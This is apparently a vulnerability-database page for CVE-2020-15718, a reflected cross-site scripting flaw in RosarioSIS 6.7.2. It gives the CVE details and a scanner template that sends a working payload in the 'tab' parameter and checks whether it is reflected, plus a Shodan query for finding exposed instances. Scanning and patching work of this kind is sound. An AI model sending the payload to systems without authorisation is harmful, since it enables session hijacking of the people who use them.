/Vulnerability Library

RosarioSIS 6.7.2 - Cross-Site Scripting

CVE-2020-15718
Verified

Description

RosarioSIS version 6.7.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability in the Preferences module. The 'tab' parameter in Modules.php is not properly sanitized, allowing an attacker to inject arbitrary JavaScript code via a crafted URL.

Severity

Medium

CVSS Score

6.1

Exploit Probability

6%

Affected Product

rosariosis

Published Date

February 13, 2026

Template Author

0xr2r, jarvis-survives

CVE-2020-15718.yaml
id: CVE-2020-15718

info:
  name: RosarioSIS 6.7.2 - Cross-Site Scripting
  author: 0xr2r,jarvis-survives
  severity: medium
  description: |
    RosarioSIS version 6.7.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability in the Preferences module. The 'tab' parameter in Modules.php is not properly sanitized, allowing an attacker to inject arbitrary JavaScript code via a crafted URL.
  impact: |
    An attacker can execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or other malicious actions.
  remediation: |
    Update RosarioSIS to the latest version where input validation has been improved.
  reference:
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/184944
    - https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2020-15718.md
    - https://gitlab.com/francoisjacquet/rosariosis/-/blob/mobile/CHANGES.md
    - https://gitlab.com/francoisjacquet/rosariosis/-/commit/89ae9de732024e3a2e99262aa98b400a1aa6975a
  classification:
    cve-id: CVE-2020-15718
    cwe-id: CWE-79
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    epss-score: 0.06325
    epss-percentile: 0.92787
    cpe: cpe:2.3:a:rosariosis:rosariosis:6.7.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"RosarioSIS"
    product: rosariosis
    vendor: rosariosis
  tags: cve,cve2020,rosarios,xss,rosariosis,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/Modules.php?modname=Users/Preferences.php&tab="%20onmouseover=alert(document.domain)%20x="'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '" onmouseover=alert(document.domain)'
          - 'RosarioSIS'
        condition: and
        case-insensitive: true

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206bc67a966e821b0e30b0e48d7bbbef32a1da9ac9c5be4fd0f0629e0e05699332022100998af9ce7e295a7884752e800a3f9857a215b4cc425ede97a48db35c7b3174e4:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2020-15718
CWE ID:
cwe-79

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/184944https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2020-15718.mdhttps://gitlab.com/francoisjacquet/rosariosis/-/blob/mobile/CHANGES.mdhttps://gitlab.com/francoisjacquet/rosariosis/-/commit/89ae9de732024e3a2e99262aa98b400a1aa6975a

Remediation Steps

Update RosarioSIS to the latest version where input validation has been improved.